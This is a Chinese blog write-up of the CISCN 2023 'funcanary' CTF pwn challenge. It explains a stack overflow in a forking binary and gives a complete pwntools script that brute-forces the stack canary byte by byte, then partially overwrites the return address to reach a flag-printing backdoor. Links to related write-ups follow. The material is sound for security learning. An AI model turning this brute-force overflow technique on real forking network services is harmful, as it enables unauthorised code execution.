【pwn】[CISCN 2023 初赛]funcanary --爆破canary和pie

于 2023-11-14 21:29:34 发布
阅读量161 收藏 1
点赞数
文章标签: java 开发语言 安全 网络安全 c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/question55/article/details/134408521
版权

拿到程序先查一下保护状态

可以发现保护全开,再看一下程序的逻辑

可以发现,这里有一个fork函数:

C语言中的fork()函数用于创建一个新的进程,该进程是原始进程(父进程)的一个副本。这个副本将从fork()函数之后的代码行开始执行,父进程和子进程在此处分别继续执行不同的代码。
fork()函数的返回值有以下三种可能情况:
如果返回-1,表示创建新进程失败。 
如果返回0,表示当前进程是子进程。 
如果返回一个正整数,表示当前进程是父进程,返回的整数是子进程的进程ID。

就算说fork函数会开启一个子进程,然后根据while,可以发现这个程序会不断开启子进程,我们再点进去sub_128A()函数看看

这里的buf偏移是0x70,所以该处存在栈溢出,但是程序开了canary(Canary 设计为以字节 \x00 结尾,本意是为了保证 Canary 可以截断字符串),但是我们可以利用上面的fork函数不断爆破canary的值。

在这里,大概可以判断canary的值在rbp的上面,又因为程序开了pie,导致rop难度很大,先找找有没有getshell的字符串,发现程序是有这样的代码段的

那这里的思路就明确了,这个pie还是得爆破一下

exp:

from pwn import *

context(os='linux',arch='amd64',log_level='debug')

p = remote("node5.anna.nssctf.cn",28272)

p.recvuntil('welcome\n')

canary = b'\x00'  # 将初始的 canary 值改为字节串

for k in range(7):          #总共要爆破7位

    for i in range(256):

        payload = b'a' * 0x68 + canary + bytes([i])  # 将所有相关字符串改为字节串并使用 bytes([i]) 来构造字节串

        p.send(payload)

        data = p.recvuntil("welcome\n")

        print(data)

        if b"fun" in data:

            canary += bytes([i])  # 确保更新的 canary 也是字节串

            print("canary is:" + str(canary))

            break

back_door = 0x231

for i in range(15):

    num=i<<12

    payload = b'a' * 0x68 + p64(u64(canary)) + b'a' * 8 + p16(0x231+num)

    p.send(payload)

    flag=p.recv()

    if b"NSSCTF" in flag:

        print(str(flag))

        break

p.interactive()

GGb0mb
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
CISCN 2023 初赛 pwn——Shellwego 题解
CoLin的pwn小屋
05-28 1776
CISCN 2023 初赛 pwn Shellwego题解
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2125
2022 CISCN 初赛pwn的完整wp
funcanary[CISCN2023初赛]-爆破canary+pie
qq_53928256的博客
05-29 691
根据PIE的保护的特性我们可以知道(请先进行PIE保护的相关学习),地址的后3位是不变的,所以只需要的原先返回地址的基础之上将返回地址的后三位覆盖位system(“/bin/cat flag”)函数调用的地址即可,即为修改为“0x231”(该地址只需要在IDA看偏移地址即可),根据“字符”查找到特殊的字符串“/bin/cat flag”,所以可能存在直接的system(“/bin/cat flag”)函数,通过追踪定位,发现确实存在相应函数。先检查文件的保护以及文件的类型,保护全开,64位程序。
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1118
CISCN2021pwn pwny(数组越界,劫持exit_hook)
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
CISCN2023初赛pwn
qq_51627915的博客
05-29 279
2023ciscn初赛
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1260
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
D-CTF Quals 2016 - Warm heap
Bill
06-18 618
原文地址:https://thegoonies.rocks/d-ctf-quals-2016-warm-heap-exploit/ 文件下载地址:https://github.com/BBS-Bill-Gates/2016-CTF-WriteUp checksec:gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX
2018年全国大学生信息安全竞赛 CISCN Writeup
热门推荐
aptx4869_li的博客
06-07 1万+
逆向:RE:题目文件:链接:点击打开链接 密码:hyzy这题当时做的时候陷入了出题人的陷阱,上来找到了“关键部分”就开始逆,但是遇到了很多问题,因为有很多函数,而且篇幅都不小,而且每个函数还要调用其他一大堆函数,这就大大增加了工作量,后面实在看不下去了,就放弃了。后面找到一些大佬的writeup看了看,原来是思路的问题:总结一下:逆向赛题一般工作量不会大到让你逆不了,一下锁定了十七八个函数肯定是有...
CISCN PWN签到题 task_note_service
Bill
05-02 1619
序言 比赛中这道差那么一点点就做出来了 程序运行 1.menu ---------menu--------- 1. add note 2. show note 3. edit note 4. del note 5. exit your choice&gt;&gt; 2. add 1. add note 2. show note 3. edit note 4. del...
pwnciscn_2019_s_4
Nothing
03-06 755
main函数,存在八个字节溢出,栈迁移,第一次泄露ebp,得到栈上buf地址,迁移到buf即可。 from pwn import * io=remote('node3.buuoj.cn',28060) leave=0x8048562 sys_plt=0x8048400 pl1='a'*0x24+'bbbb' io.send(pl1) io.recvuntil('bbbb') ebp=u32(...
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1133
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
PWN】2019-ciscn your——pwn
Joaus的博客
05-05 857
这题的漏洞点就在数组下标越界,造成栈上任意地址读写。 在做的时候遇到的坑点: 1.在于数组类型转换输出会造成误导: 2.对不给libc.so的题可以用libcsearch和onegadget配合得到onegadget地址,因为我直接调用system函数会出现段错误,应该是在对栈上数据进行操作覆盖了环境变量???但是用onegadget就成功getshelll。 from LibcSearcher...
【BUUCTF - PWNciscn_2019_c_1
古月浪子的博客
03-20 4032
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
mqtt-pwn安装
最新发布
09-20
2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值